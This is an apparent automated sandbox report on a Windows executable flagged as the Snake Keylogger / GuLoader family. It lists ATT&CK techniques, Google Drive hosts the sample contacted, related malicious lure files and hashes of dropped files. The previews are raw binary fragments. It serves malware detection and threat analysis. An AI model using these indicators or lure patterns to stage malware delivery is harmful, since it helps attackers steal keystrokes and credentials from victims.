      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_00405F6A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,4_2_00405F6A
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      DLL Side-Loading
      11
      Process Injection
      11
      Masquerading
      OS Credential Dumping21
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Clipboard Data
      3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Process Injection
      Security Account Manager3
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information
      NTDS23
      System Information Discovery
      Distributed Component Object ModelInput Capture14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      ME-SPC-94.03.60.175.07.exe55%ReversingLabsWin32.Trojan.SnakeKeylogger
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsh56A9.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      172.217.19.174
      truefalse
        high
        drive.usercontent.google.com
        142.250.181.1
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.comME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099822915.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1780419041.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.0000000007123000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940578901.0000000007112000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436407199.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144397489.000000000711A000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881422435.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2256149763.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035369443.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007058000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063124661.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1809306009.00000000070CC000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://drive.usercontent.google.com/ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940459246.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967537736.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063124661.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2256232847.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1809306009.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1653182193.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2908504288.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1780419041.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2255968173.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144276351.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881422435.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035369443.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2409610754.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2754804680.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2598985924.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436273091.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099903661.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2283011748.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099822915.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2562778198.00000000070F5000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://apis.google.comME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099822915.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1780419041.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.0000000007123000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940578901.0000000007112000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436407199.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144397489.000000000711A000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881422435.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2256149763.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035369443.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007058000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063124661.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1809306009.00000000070CC000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://nsis.sf.net/NSIS_ErrorErrorME-SPC-94.03.60.175.07.exefalse
                  high
                  https://translate.google.com/translate_a/element.jsME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881673139.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436407199.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063254420.000000000711A000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967537736.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726731024.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2754922888.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2409610754.0000000007123000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2908618007.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1653182193.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2562940233.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2409610754.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144397489.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2908504288.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1624372148.0000000007115000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2598985924.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099822915.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1780419041.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.0000000007123000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436407199.0000000007122000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://drive.google.com/ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.00000000070F5000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://drive.google.com/ids.comME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063124661.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2256232847.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2908504288.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2255968173.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144276351.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881422435.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035369443.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2409610754.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2754804680.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2598985924.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436273091.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099903661.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2283011748.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099822915.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2562778198.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.00000000070F5000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://drive.google.com/ertificatesME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://drive.google.com/ificateME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://drive.google.com/dzME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007058000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              142.250.181.1
                              drive.usercontent.google.comUnited States
                              15169GOOGLEUSfalse
                              172.217.19.174
                              drive.google.comUnited States
                              15169GOOGLEUSfalse
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1576273
                              Start date and time:2024-12-16 18:04:12 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 42s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Run name:Run with higher sleep bypass
                              Number of analysed new started processes analysed:14
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:ME-SPC-94.03.60.175.07.exe
                              Detection:MAL
                              Classification:mal68.troj.evad.winEXE@3/10@2/2
                              EGA Information:
                              • Successful, ratio: 50%
                              HCA Information:
                              • Successful, ratio: 83%
                              • Number of executed functions: 48
                              • Number of non-executed functions: 76
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target ME-SPC-94.03.60.175.07.exe, PID 5064 because there are no executed function
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: ME-SPC-94.03.60.175.07.exe
                              No simulations
                              No context
                              No context
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              37f463bf4616ecd445d4a1937da06e1909-FD-94.03.60.175.07.xlsx.exeGet hashmaliciousGuLoaderBrowse
                              • 142.250.181.1
                              • 172.217.19.174
                              TEC-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                              • 142.250.181.1
                              • 172.217.19.174
                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                              • 142.250.181.1
                              • 172.217.19.174
                              dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                              • 142.250.181.1
                              • 172.217.19.174
                              InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                              • 142.250.181.1
                              • 172.217.19.174
                              nB52P46OJD.exeGet hashmaliciousVidarBrowse
                              • 142.250.181.1
                              • 172.217.19.174
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 142.250.181.1
                              • 172.217.19.174
                              PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                              • 142.250.181.1
                              • 172.217.19.174
                              njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                              • 142.250.181.1
                              • 172.217.19.174
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Temp\nsh56A9.tmp\System.dll09-FD-94.03.60.175.07.xlsx.exeGet hashmaliciousGuLoaderBrowse
                                TEC-SPC-94.03.60.175.07.exeGet hashmaliciousGuLoaderBrowse
                                  Purchase-Order27112024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    563299efce875400a8d9b44b96597c8e-sample (1).zipGet hashmaliciousUnknownBrowse
                                      debit-note-19-08-dn-2024.exeGet hashmaliciousGuLoaderBrowse
                                        debit-note-19-08-dn-2024.exeGet hashmaliciousGuLoaderBrowse
                                          HE9306_AWBLaser_Single240812144358.exeGet hashmaliciousGuLoaderBrowse
                                            HE9306_AWBLaser_Single240812144358.exeGet hashmaliciousGuLoaderBrowse
                                              z41_EX24-772_24.exeGet hashmaliciousGuLoaderBrowse
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):45
                                                Entropy (8bit):4.7748605961854445
                                                Encrypted:false
                                                SSDEEP:3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
                                                MD5:8B9FC0443D7E48145E2D4B37AFB2D37B
                                                SHA1:64A5718A478A38AC262D2E46DA81D0E88C122A0F
                                                SHA-256:4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
                                                SHA-512:5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):11776
                                                Entropy (8bit):5.656006343879828
                                                Encrypted:false
                                                SSDEEP:192:eP24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlbSl:T8QIl975eXqlWBrz7YLOlb
                                                MD5:3E6BF00B3AC976122F982AE2AADB1C51
                                                SHA1:CAAB188F7FDC84D3FDCB2922EDEEB5ED576BD31D
                                                SHA-256:4FF9B2678D698677C5D9732678F9CF53F17290E09D053691AAC4CC6E6F595CBE
                                                SHA-512:1286F05E6A7E6B691F6E479638E7179897598E171B52EB3A3DC0E830415251069D29416B6D1FFC6D7DCE8DA5625E1479BE06DB9B7179E7776659C5C1AD6AA706
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: 09-FD-94.03.60.175.07.xlsx.exe, Detection: malicious, Browse
                                                • Filename: TEC-SPC-94.03.60.175.07.exe, Detection: malicious, Browse
                                                • Filename: Purchase-Order27112024.scr.exe, Detection: malicious, Browse
                                                • Filename: 563299efce875400a8d9b44b96597c8e-sample (1).zip, Detection: malicious, Browse
                                                • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                                                • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                                                • Filename: z41_EX24-772_24.exe, Detection: malicious, Browse
                                                Reputation:moderate, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....n3T...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1171371
                                                Entropy (8bit):3.2073810382172203
                                                Encrypted:false
                                                SSDEEP:12288:TP7XiL27/OufaAr9hVgqWYVQmutk+DTPh:DbiLW/baCQZYV7uaATPh
                                                MD5:6D8E775E1417BA2913567DFC3F9BA77B
                                                SHA1:DC74B39D0D03105F2F074FD7AD98A5AD3C66929E
                                                SHA-256:2AB23F4D0227BA41DE2F194875D45769AF0E1FACA66217761C9AA625BDC5F4F2
                                                SHA-512:673AF93CD2F18CC4E27597770C3BB2302AD088158F4F774DAD4F5E5E2A01D3A4DA9D15A3AF43B5DE9C8F78C8EED0FEC37DC7B5038929FBC596F175B9C5FF6813
                                                Malicious:false
                                                Reputation:low
                                                Preview:. ......,...................\...........J........ ..........................................................................................................................................................................................................................................G...J...............j...........................................................................................................................................3.......h...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):28
                                                Entropy (8bit):4.110577243331642
                                                Encrypted:false
                                                SSDEEP:3:iGAeTUHvn:lAeTUHv
                                                MD5:F6A80CF0B011E1638B38D8EAA2A9629B
                                                SHA1:30AB7FEEC5D0A304ED9908ADD562601E3E7118C3
                                                SHA-256:AB3B162F39F8FDBD8DD767791EC116E75DA198FCE6BABBA6E1677044678714D8
                                                SHA-512:E1EC33696EA5086DEA0A52B577442B96124B71CD09999637185D114B7E5F313D455560C350F5A02FBA83C5A3A12A5234EEC995D0AF0CBF64471B3887E2AA2ED8
                                                Malicious:false
                                                Reputation:low
                                                Preview:[Access]..Setting=Disabled..
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):26229
                                                Entropy (8bit):4.565944827284422
                                                Encrypted:false
                                                SSDEEP:384:93fjiECevfwGAtCWJKOOJIhG/Ozblh/bybWIIEwNfFBLsXoEnFkip2qxzBQxfMOz:9vmEbVAtHJKOaEeO2iIsNfrlynDCUG3
                                                MD5:9B16A31FF7B612839FA33F417EA765A6
                                                SHA1:963DB121A2B4C783667033D444EDAFA80643A795
                                                SHA-256:FF6DEF9EA03C332719BECED7941FA953A0CD9A9256DC5D59406967C04A4E682F
                                                SHA-512:62FAFFEBD3AE1E93E4F3594AA5C2C2CF92C627D31454EAE969E04FA605FEC8AD31BBC4A4678AE5E7E7DE9E84F89119BF19477FEF1B564EE448036CCAF9FFD64D
                                                Malicious:false
                                                Preview:...........=..........C...............00.||........SS......,.yyyy...........O..................i............@@........................gg...............hh.....#......::.MMMM.........]..,,.........K..##..**......U...nn.....'.kk.9.......................www.<<<.T................L.?...k...>>..1........^.........j.............KKK..P.....#.........OO.aa.KK.........YYYYYY..c..X...............r....<<..b..@.....m.......^........++.......999.9...xx........;;............].................{.g....GGG.::..G....................9....z......\..(....ttt....).........-----....x.44.............WW............}......HHHH.................TT.l.SS..Y...........(((((..uu......VVVVV..9........-......................Y..Y...................l.....^.....................o..[.........J....................F...........................gg.....{.....>..................%..............NNNNN.......BBBBBBBBB.....!....... .."...p.).................=.SSSS.................G................FF..{.....++++...3........JJ..............
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):207998
                                                Entropy (8bit):1.2479248406208852
                                                Encrypted:false
                                                SSDEEP:768:tCENokMNjB1phztRILF3znwMWQZeRdtDL7xIC8GI82e/2awZ6aXmpeNhLvkoVtOX:e03p6cf0/e9ReE8H
                                                MD5:5C283F56F45AD89C5D82538EA09AC0F5
                                                SHA1:FA3736CF43F5841B9D4E28FF2024C17897EEF745
                                                SHA-256:D53EE062B5FA4EB7DED4A658B37B70DD6E90A581AF5BDE713169971AE249F605
                                                SHA-512:2B2516707050C5DFB7A8D9E151DEE98EDD44B59B08E0F19D301F80BFDE89129F47EC6079AC1E26F6D8C60AAFE2931A4D2BC720BEDD8149477810B0C8F558AD0A
                                                Malicious:false
                                                Preview:..(.................>............................................................................................................8....dq......................`..-..............................................g..........s...............................................................................................................................b...RE.b.........................................................................w..........................................................................................%............................P..........]...............:.........B..........................................4.......................................................................n...............................................................o................4..................y...9........#......................m.....z...........................................................K.....D..............m...........................>...................?.....................k.....
                                                Process:C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):264581
                                                Entropy (8bit):7.555057521954099
                                                Encrypted:false
                                                SSDEEP:6144:nJPaL2n7c2OXefawhWWWALf5VgS6yj7ylLYVq6vDj+mBUtu:JiL27/OufaAr9hVgqWYVQmutu
                                                MD5:BD4C8B17F76F44CA7A5F7AECB04DCA2A
                                                SHA1:AE1CA4155EC65CECA9EC5563179435809EBF5C14
                                                SHA-256:C27579D13768E93402220A2A7F31AF382B0B6053F35B61F71D8EE7AEAAAF6FAA
                                                SHA-512:54DF5A7BD7CA198586BED131DFFE7EBB5520EDD0D223DBC4CA923172B0FA11A8F41F76FDDFF301E0D8C00AAACD197D8088C8919C351559D47AD884F45DABCC91
                                                Malicious:false
                                                Preview:..mm....UU...........a.....R.....Q.....nnn.........((..77.................u.....==......".............A.t....Y...................$.......B.a..:.!...BB...A.....SS.......................................................................AA.D...*.?....C......*........E.....RR.......BB.....eee..^^^..=......2............s...%%........g......../.............;;;;.....y.........ff..................................vvvvv.e...........................ZZZ..77............//.....::::..u.%.....,..................;.................=...................-...A.s..............L.......8.(((........ee.........eee..p.N..........l.A..........%%%%%%%.................................w.........].....................................................qqqq...$$....NN..O..}.............WW..+............$$$$..33........y...&.,..........]....tt...%%.|..............r.LLL........................?.....r.HHHH...............................<..WWW..................7777......e..........bbbbbbbb.rr...............Q.....=.............
